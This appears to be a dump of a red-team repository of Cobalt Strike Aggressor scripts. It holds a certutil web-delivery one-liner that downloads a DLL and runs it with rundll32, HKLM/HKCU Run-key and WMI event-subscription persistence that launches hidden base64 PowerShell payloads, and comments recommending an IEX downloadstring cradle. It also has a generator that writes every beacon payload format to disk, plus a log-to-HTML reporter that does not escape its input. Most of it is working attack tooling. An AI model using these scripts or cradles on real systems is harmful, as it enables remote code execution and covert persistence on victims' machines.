    # NOTE(review): certutil -urlcache also keeps a copy of the download in the
    # user's URL cache (`certutil -urlcache * delete` clears it) -- confirm and
    # add cleanup if that matters for the engagement.
    prompt_text("Copy/Paste One-liner: ", "powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW", {});
    show_message("Be aware of the default values in this script and change them! (Adobedll.dll, dll.txt)");
    elog("powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW");

}
35 |
36 | # create a popup menu
# Attacks menu entry that collects the web-delivery options and hands them to
# &stage_attack (as %options) when "Launch" is clicked.
popup attacks {
    item "CertUtil Web Delivery (S)" {
        local('$dialog %defaults');

        # defaults: hosted on this client's IP, port 80, path /dll.txt
        %defaults = %(uri => "/dll.txt", host => localip(), port => 80);

        $dialog = dialog("CertUtil Web Delivery (Stageless)", %defaults, &stage_attack);
        dialog_description($dialog, "A stageless version of the CertUtil Web Delivery attack.");
        drow_text($dialog, "uri", "URI Path: ", 20);
        drow_text($dialog, "host", "Local Host: ");
        drow_text($dialog, "port", "Local Port: ");
        drow_listener_stage($dialog, "listener", "Listener: ");
        drow_checkbox($dialog, "x64", "x64: ", "Use x64 payload");
        dbutton_action($dialog, "Launch");
        dialog_show($dialog);
    }
}
60 |
61 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/EDRQuery.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}
8 | WinExe
9 | Properties
10 | EDRQuery
11 | EDRQuery
12 | v3.5
13 | 512
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | true
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
58 |
--------------------------------------------------------------------------------
/Persistence/HKLMRunKeyPSRegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #HKLM Run Key Registry PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
4 |
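sub payloadgenerate {
    # Returns the base64 of a PowerShell one-liner for the first listener whose
    # *name* contains "http" (case-insensitive), or $null when no listener
    # name matches. $1 (beacon id) is accepted for call compatibility but
    # is not used.
    # NOTE: the match is on the listener name, not its payload type -- name
    # HTTP/HTTPS listeners accordingly. An identical copy of this sub lives in
    # HKCURunKeyPSRegistryPersist.cna; whichever script loads last wins.
    local('$name');
    foreach $name (listeners()) {
        # "https" contains "http", so one pattern covers both.
        if (lc($name) hasmatch "http") {
            return base64_encode(artifact($name, "powershell"));
        }
    }
    return $null;
}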
15 |
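sub persistRegistryHKLM {
    # HKLM Run-key persistence dialog for the selected Beacon ($1).
    # Writes two values under HKLM\...\CurrentVersion\Run: the first holds the
    # base64 PowerShell payload, the second a powershell.exe command that
    # reads the first, decodes it and IEXes it at logon. Writing HKLM needs an
    # elevated beacon.
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("HKLM Run Key Registry PowerShell Persistence (Admin Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
        local('$data $powershellcmd $powershellcmd1 $powershellcmd2 $powershellcmd3');
        # Refuse to run while a field still holds its placeholder text.
        if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
            berror($bid, "\c4Please enter valid Registry Key Names.");
            return;
        }
        # &payloadgenerate returns $null when no listener name contains "http";
        # bail out instead of writing an empty payload value.
        $data = payloadgenerate($bid);
        if (strlen($data) == 0) {
            berror($bid, "\c4No HTTP/HTTPS listener found (the listener name must contain 'http').");
            return;
        }
        # Key names are spliced into PowerShell source unquoted in the second
        # value (gp ... keyname).keyname -- use names without spaces or quotes.
        $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
        bpowerpick!($bid, $powershellcmd);
        blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
        # NOTE: the launcher path is hard-coded to the SysWOW64 (32-bit)
        # PowerShell, so the logon payload runs as a 32-bit process on x64
        # hosts and the path does not exist on 32-bit Windows.
        $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
        bpowerpick!($bid, $powershellcmd1);
        blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
        blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
        $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
        bpowerpick!($bid, $powershellcmd2);
        $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
        bpowerpick!($bid, $powershellcmd3);
    }, $bid => $bid));

    dialog_description($dialog, "HKLM Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon.");

    drow_text($dialog, "keyname", "Registry Key Name for Payload:");
    drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}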
48 |
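popup beacon_bottom {
    # Beacon context-menu entry. $1 is the list of selected beacon ids.
    # HKLM\...\Run is only writable from an elevated context, so gate each
    # beacon on -isadmin the same way the Service and GPO persistence
    # menus do instead of letting the Set-ItemProperty fail on the target.
    item "HKLM Run Key Registry PowerShell Persistence" {
        local('$bid');
        foreach $bid ($1) {
            if (-isadmin $bid) {
                persistRegistryHKLM($bid);
            }
            else {
                berror($bid, "\c4HKLM Run Key Persistence Requires Admin Level Privileges");
            }
        }
    }
}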
54 |
--------------------------------------------------------------------------------
/Logging/logs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import os
4 | import sys
5 | import datetime
6 |
# Log-directory layout produced by Logger.cna (see Logging/README.md).
operator_path = '/opt/cobaltstrike/logs/operator_logs/operator_input/'
beacon_path = '/opt/cobaltstrike/logs/operator_logs/beacon_output/'
# Everything after the script name is joined with spaces and used both as a
# substring filter on operator-input lines and as part of the output file name.
args = sys.argv[1:]
num = 0
date_timestamp = str(datetime.datetime.now().strftime("%Y%b%d"))
log_file_path = date_timestamp+"_"+str(" ".join(args))+"_log.html"

# Opened in append mode: re-running on the same day appends a second report
# to the same file. Not closed on an exception inside the loop below.
log_file = open(log_file_path,"a+")
log_file.write("""



Logged @ """ + str(datetime.datetime.now().strftime("%Y%b%d %H:%M:%S")) + """


| OperatorName |
TargetIP |
TargetHostname |
Username |
ProcessId |
Timestamp |
Command |
LogOutput |

""")

for filename in os.listdir(operator_path):
    with open(operator_path+filename,"r") as log:
        for line in log:
            if " ".join(args) in line:
                num += 1
                # Input lines are taken apart as
                #   operator[ip_hostname] user/pid|timestamp > command
                # (inferred from the splits below; a line that does not follow
                # this shape raises IndexError and aborts the run).
                cmd_info = line.split(">")[0]

                operator_name = cmd_info.split("[")[0]
                ip = str(str(cmd_info.split("[")[1]).split("]")[0]).split("_")[0]
                hostname = str(str(cmd_info.split("[")[1]).split("]")[0]).split("_")[1]
                user = str(str(cmd_info.split("|")[0]).split("]")[1]).split("/")[0]
                pid = str(str(cmd_info.split("|")[0]).split("]")[1]).split("/")[1]
                timestamp = cmd_info.split("|")[1]
                date = str(timestamp.split(" ")[0])

                cmd = line.split(">")[1:]
                # SECURITY NOTE(review): every value below (operator name,
                # target IP/hostname, user, PID, timestamp and the raw command
                # line) is interpolated into HTML without any escaping.
                # Hostnames, usernames and command text originate from the
                # target environment, so a crafted value becomes live markup
                # (or script) in the report when it is opened in a browser.
                # Escaping each field (cgi.escape / html.escape) before
                # substitution would close that.
                # NOTE(review): the HTML tags of this template were stripped in
                # this listing; the tuple supplies 11 values, so the original
                # template must contain 11 %s placeholders (the "Log Output"
                # cell is presumably a link built from beacon_path, date, ip
                # and hostname).
                table = """

| %s |
%s |
%s |
%s |
%s |
%s |
%s |
Log Output |

""" % (operator_name,ip,hostname,user,pid,timestamp,str(' '.join(cmd)),beacon_path,date,ip,hostname)
                log_file.write(table)
# Footer: number of matching entries found across all input logs.
log_file.write("""

""" + str(num) + """ Log Entries



""")
log_file.close()
70 |
--------------------------------------------------------------------------------
/Persistence/HKCURunKeyPSRegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #HKCU Run Key Registry PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
4 | #Big thanks to @christruncer and @merrillmatt011 for the help and code snippets
5 | #Fileless Registry Persistence using PowerShell
6 |
sub payloadgenerate {
    # Returns the base64 of the PowerShell artifact for the first listener
    # whose *name* (lower-cased) contains "http"; selection is by name, not by
    # listener type, so differently named HTTP listeners are skipped.
    # Falls off the end (no explicit return) when nothing matches - presumably
    # yielding $null to the caller; callers do not check for that.
    # The argument the caller passes is ignored (this sub takes none).
    foreach $name (listeners()) {
        $original_listener = $name;
        $listener_name = lc($name);
        # The second test is redundant: any name matching "https" already matches "http".
        if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
            $data = artifact($original_listener, "powershell");
            return base64_encode($data);
        }
    }
}
17 |
sub persistRegistryPowerShell {
    # $1 = beacon id. Builds the dialog; the lambda runs on "Create" with the
    # field values in $3 (hash keyed by the drow_text names below).
    # $bid is not local(), so it is script-global and shared between any
    # dialogs open at the same time.
    $bid = $1;
    $dialog = dialog("HKCU Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
        # Reject untouched placeholder text. ismatch is a regex test, so the
        # ".." in the placeholders match any two characters; an empty field is
        # not rejected here.
        if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
            berror($bid, "\c4Please enter valid Registry Key Names.");
            break;
        }
        else {
            $data = payloadgenerate($bid);
            # NOTE(review): the key names are spliced into single-quoted
            # PowerShell literals without escaping, so a name containing a
            # quote breaks the command; $data is not checked for $null either.
            # Defender note: both values are written in cleartext under the
            # HKCU Run key, a location routinely enumerated by autorun auditing
            # and covered by registry-write telemetry.
            $powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
            bpowerpick!($bid, $powershellcmd);
            blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
            $powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
            bpowerpick!($bid, $powershellcmd1);
            blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
            # Read both values back so the operator can verify the writes.
            blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
            $powershellcmd2 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
            bpowerpick!($bid, $powershellcmd2);
            $powershellcmd3 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
            bpowerpick!($bid, $powershellcmd3);
        }
    }));

    dialog_description($dialog, "HKCU Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon.");

    drow_text($dialog, "keyname", "Registry Key Name for Payload:");
    drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);

}
50 |
popup beacon_bottom {
    # Menu entry on the beacon context menu; $1 is the selected beacon id(s).
    # Unlike the WMI scripts in this repo there is no -isadmin gate here
    # (HKCU does not need one).
    item "HKCU Run Key Registry PowerShell Persistence" {
        persistRegistryPowerShell($1);
    }
}
56 |
--------------------------------------------------------------------------------
/Persistence/README.md:
--------------------------------------------------------------------------------
1 | # Persistence
2 |
3 | **Persistence Aggressor Scripts for Cobalt Strike 3.0+**
4 |
5 | * Persistence_Menu.cna
6 |
7 | * Includes all scripts into one beacon menu
8 |
9 | * UserSchtasksPersist.cna
10 |
11 | * User Schtasks Persistence that runs as current user for the selected beacon
12 |
13 | * Meant for quick user level persistence upon initial access
14 |
15 | * Thanks to @noone and bluescreenofjeff for assistance
16 |
17 | 
18 |
19 | * ServiceEXEPersist.cna
20 |
21 | * Admin Level Custom Service EXE Persistence
22 |
23 | * Runs as elevated user/SYSTEM for the selected beacon
24 |
25 | 
26 |
27 | * WMICEventPersist.cna
28 |
29 | * Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
30 |
31 | * Very syntax-heavy; test first before using on live targets
32 |
33 | 
34 |
35 | * WMIEventPersist.cna
36 |
37 | * Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon
38 |
39 | * Very syntax-heavy; test first before using on live targets
40 |
41 | 
42 |
43 | * StartupGPOPersist.cna
44 |
45 | * Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
46 |
47 | * Calls back as SYSTEM
48 |
49 | * Check permissions with GPO enumeration (a successful GroupPolicy directory listing) before executing
50 |
51 | * Beacon execution will cause winlogon.exe to hang so the end user cannot log in. Once the new beacon checks in, inject into another process and kill the original. An update is coming soon.
52 |
53 | 
54 |
55 | * RegistryPersist.cna
56 |
57 | * Creates a Custom Registry Key, Value, Type, and Payload Location based on user input for selected beacon
58 |
59 | 
60 |
61 | * HKCURunKeyPSRegistryPersist.cna
62 |
63 | * Creates two Custom Registry Run Key entries in HKCU
64 |
65 | * The Payload is a base64 encoded powershell payload based off your HTTP/HTTPS listener
66 |
67 | 
68 |
69 | * Bitsadmin.cna
70 |
71 | * Creates a bitsadmin job that executes on reboot
72 |
73 | * Currently works on Windows 7, 8, Server 2008, Server 2012
74 |
75 | 
76 |
--------------------------------------------------------------------------------
/Persistence/WMICEventPersist.cna:
--------------------------------------------------------------------------------
1 | #Permanent WMI Event using WMIC Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
4 | #Very syntax heavy, Test first before using on live targets
5 |
sub persistwmieventwmic {
    # $1 = beacon id. Dialog callback receives the field values in $3.
    # $bid is script-global (no local()), shared with other open dialogs.
    $bid = $1;
    $dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({
        # Placeholder check. NOTE(review): the commandline and payloadfile
        # patterns here ('...-w hidden)' and 'Select Encoded Payload..') do not
        # match the defaults set above ('...-w hidden -enc)' and
        # 'Encoded Payload String..'), so those two fields are never rejected
        # when left untouched.
        if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') {
            berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File.");
            break;
        }
        else {
            # Each wmic command line is built by string concatenation of the
            # dialog fields; a double quote in any field breaks the quoting.
            # split("/", ...)[-1] keeps only the text after the last "/" of the
            # payload field - presumably a leftover from a file-path version.
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"');
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"');
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""');
            # Read-back of the three created objects for verification.
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list');
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list');
            bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list');
        }
    }));
    dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** ");

    #base 64 encode IEX of the powershell one liner
    #cat payload.txt | iconv --to-code=UTF-16LE | base64

    drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
    drow_text($dialog, "eventquery", "Custom Event Query:");
    drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:");
    drow_text($dialog, "commandline", "Custom Command Line Options:");
    drow_text($dialog, "payloadfile", "Custom Encoded Payload String:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);

}
37 |
popup beacon_bottom {
    # $1 is the list of selected beacon ids; one dialog per elevated beacon.
    item "&Permanent WMI Event using WMIC Persistence" {
        local('$bid');
        foreach $bid ($1) {
            if (-isadmin $bid) {
                persistwmieventwmic($bid);
            }
            else {
                # Error is sent to the whole selection ($1), not just this $bid.
                berror($1, "\c4Persistence Requires Admin Level Privileges");
            }
        }
    }
}
51 |
--------------------------------------------------------------------------------
/Persistence/WMIEventPersist.cna:
--------------------------------------------------------------------------------
1 | #Permanent WMI Event using PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Custom WMI Event using Powershell for SYSTEM Level persistence on selected beacon
4 | #Very syntax heavy, Test first before using on live targets
5 | #Sample Queries:
6 | ## User Logon:
7 | #SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
8 | ## System UpTime (Reboot):
9 | #SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320
10 | #https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
11 | ##Recommended Encoded Payload:
12 | #base 64 encode IEX of the powershell one liner ex: IEX (new-object net.webclient).downloadstring('http://10.1.1.1/a') > payload.txt
13 | #cat payload.txt | iconv --to-code=UTF-16LE | base64 -w 0
14 |
sub persistwmievent {
    # $1 = beacon id. $bid and $ExePath are script-global (no local()), so a
    # second dialog opened before the first is submitted overwrites them.
    $bid = $1;
    # PowerShell path chosen by the beacon's architecture (-is64).
    if (-is64 $bid) {
        $ExePath = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
    }
    else {
        $ExePath = "C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
    }

    $dialog = dialog("Permanent WMI Event Persistence with PowerShell", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", payloadstring => "Encoded Payload String.."), lambda({
        # Reject untouched placeholder text (regex match; empty fields pass).
        if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['payloadstring']" ismatch 'Encoded Payload String..') {
            berror($bid, "\c4Please enter a valid __EventFilter Name, Event Query, and an Encoded Payload String.");
            break;
        }
        else {
            # One PowerShell statement built by concatenating the dialog
            # fields into double-quoted PowerShell strings; a double quote or
            # "$" in a field alters the statement. Size limit on the payload
            # string is stated in the dialog description, not enforced here.
            $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name=\"".$3['eventfilter']."\";EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"".$3['eventquery']."\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=\"".$3['eventfilter']."\";CommandLineTemplate =\"". $ExePath ." ".$3['payloadstring']."\"};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
            bpowerpick!($bid, $powershellcmd);
            blog($bid, 'Permanently Storing '.$3['eventfilter'].' in root\CimV2..');
            # Read-back of the filter and consumer for verification.
            bpowerpick($bid, 'Get-WmiObject __eventFilter -namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
            bpowerpick($bid, 'Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
        }
    }));
    dialog_description($dialog, "Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload String must be converted to UTF-16LE, base64 encoded and under 1MB.**");

    drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
    drow_text($dialog, "eventquery", "Custom Event Query:");
    drow_text($dialog, "payloadstring", "Custom Encoded Payload String:");

    dbutton_action($dialog, "Create");
    dialog_show($dialog);
}
46 |
popup beacon_bottom {
    # $1 is the list of selected beacon ids; one dialog per elevated beacon.
    item "&Permanent WMI Event Persistence with PowerShell" {
        local('$bid');
        foreach $bid ($1) {
            if (-isadmin $bid) {
                persistwmievent($bid);
            }
            else {
                # Error is sent to the whole selection ($1), not just this $bid.
                berror($1, "\c4Persistence Requires Admin Level Privileges");
            }
        }
    }
}
60 |
--------------------------------------------------------------------------------
/ArtifactPayloadGenerator.cna:
--------------------------------------------------------------------------------
1 | #Automatic Artifact Payload Generator
2 | #Author: @r3dQu1nn
3 | #Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
4 |
#Custom Directory for Payloads
# Created on the machine running this script when it loads; the paths are
# hard-coded and reused by payloadgenerate below.
mkdir("/opt/cobaltstrike/Staged_Payloads");
mkdir("/opt/cobaltstrike/Stageless_Payloads");

# Top-level menubar entry whose popup is defined next.
menubar("Payload Generator", "payloadgenerator");
popup payloadgenerator {
    item "&Automatic Artifact Payload Generator" {
        # Confirmation first; the generation itself runs in the callback.
        prompt_confirm("Do you want to generate all the different types of Artifacts?", "Payload Generator Confirmation", {
            show_message("Generating Artifacts...");
            payloadgenerate();
            # Message names the parent directory; files go to the two
            # *_Payloads subdirectories created above.
            show_message("Check /opt/cobaltstrike/ for Staged and Stageless Payloads");
        });
    }
}
19 |
sub payloadgenerate {
    # Writes one staged artifact per format and one stageless artifact per
    # format to fixed paths for every local listener whose name contains
    # "http". Because the output paths are constants inside the loop, each
    # matching listener overwrites the previous one's files: only the last
    # matching listener's artifacts survive. No variable here is local(), so
    # $data*, $handle*, $cradle* all leak into script scope.
    foreach $name (listeners_local()) {
        $original_listener = $name;
        $listener_name = lc($name);
        # Second test is redundant: "https" already contains "http".
        if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {

            #Staged Payloads
            $data = artifact_stager($original_listener, "dll");
            $data2 = artifact_stager($original_listener, "exe");
            $data3 = artifact_stager($original_listener, "powershell");
            $data4 = artifact_stager($original_listener, "python");
            $data5 = artifact_stager($original_listener, "svcexe");
            $data6 = artifact_stager($original_listener, "vbscript");
            $data7 = artifact_stager($original_listener, "raw");

            #Write and Save Payloads
            # openf(">path") truncates; each handle is closed right after its write.
            $handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
            writeb($handle, $data);
            closef($handle);
            $handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
            writeb($handle2, $data2);
            closef($handle2);
            $handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
            writeb($handle3, $data3);
            closef($handle3);
            $handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
            writeb($handle4, $data4);
            closef($handle4);
            $handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
            writeb($handle5, $data5);
            closef($handle5);
            $handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
            writeb($handle6, $data6);
            closef($handle6);
            $handle7 = openf(">/opt/cobaltstrike/Staged_Payloads/rawpayload.bin");
            writeb($handle7, $data7);
            closef($handle7);

            #Stageless Payloads
            # Note the dll is the only x64 artifact; everything else is x86.
            $data8 = artifact_payload($original_listener, "dll", "x64");
            $data9 = artifact_payload($original_listener, "exe", "x86");
            $data10 = artifact_payload($original_listener, "python", "x86");
            $data11 = artifact_payload($original_listener, "powershell", "x86");
            $data12 = artifact_payload($original_listener, "raw", "x86");
            $data13 = artifact_payload($original_listener, "svcexe", "x86");

            #Write and Save Payloads
            # $data10/$data11 are written out of numeric order (python -> cradle5,
            # powershell -> cradle3); the format-to-filename mapping is still right.
            $cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
            writeb($cradle, $data8);
            closef($cradle);
            $cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
            writeb($cradle2, $data9);
            closef($cradle2);
            $cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
            writeb($cradle3, $data11);
            closef($cradle3);
            $cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
            writeb($cradle4, $data12);
            closef($cradle4);
            $cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/pythonpayload.py");
            writeb($cradle5, $data10);
            closef($cradle5);
            $cradle6 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
            writeb($cradle6, $data13);
            closef($cradle6);
        }
    }
}
88 |
--------------------------------------------------------------------------------
/logvis.cna:
--------------------------------------------------------------------------------
1 | # Beacon Command Log visualization
2 | # Author: @001SPARTaN (for @r3dqu1nn)
3 | # Tracks all your commands you executed on every beacon
4 |
5 | import ui.*;
6 | import table.*;
7 |
8 | import java.awt.*;
9 | import javax.swing.*;
10 | import javax.swing.table.*;
11 |
12 | global('$model $console $table');
13 |
sub updateTable {
    # Rebuild the command-log model from the team server's beacon log.
    # Runs in a forked Sleep environment so the UI thread is not blocked;
    # only $model is carried into that environment.
    fork({
        local('@record %row $beacon');

        # Drop the existing rows before repopulating.
        [$model clear: 1024];

        foreach @record (data_query('beaconlog')) {
            # Only operator input records become rows; output records are skipped.
            if (@record[0] ne "beacon_input") {
                continue;
            }
            $beacon = @record[1];
            # Column keys match the GenericTableModel columns in createVisualization.
            %row = %(
                operator  => @record[2],
                ip        => binfo($beacon, "internal"),
                hostname  => binfo($beacon, "computer"),
                user      => binfo($beacon, "user"),
                pid       => binfo($beacon, "pid"),
                command   => @record[3],
                timestamp => formatDate(@record[4], "MMM dd HH:mm:ss z")
            );
            [$model addEntry: %row];
        }
        # Tell attached views that the model changed.
        [$model fireListeners];
    }, \$model);
}
39 |
40 | # setupPopupMenu provided by Raphael Mudge
41 | # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
sub setupPopupMenu {
    # Attach a right-click handler to a Swing component.
    # $1 = the component (here the ATable), $2 = the name of the Aggressor
    # popup to show (here "command_log"). $model and $table are also copied
    # into the forked environment but are not used inside it.
    #
    # we're using fork({}) to run this in a separate Aggressor Script environment.
    # This reduces deadlock potential due to Sleep's global interpreter lock
    #
    # this especially matters as our mouse listener will be fired for *everything*
    # to include mouse movements.
    fork({
        [$component addMouseListener: lambda({
            # $1 is the MouseEvent; only the platform's popup trigger opens the menu.
            if ([$1 isPopupTrigger]) {
                # If right click, show popup
                show_popup($1, $name, $component);
            }
        }, \$component, \$name)];
    }, $component => $1, $name => $2, $model => $model, $table => $table);
}
57 |
sub createVisualization {
    # Build the "Beacon Command Log" table, register it as a CS visualization
    # and return the scroll pane that hosts it. $model and $table are the
    # script globals declared at the top of the file.
    this('$client');

    # One column per field of a command-log row (see updateTable).
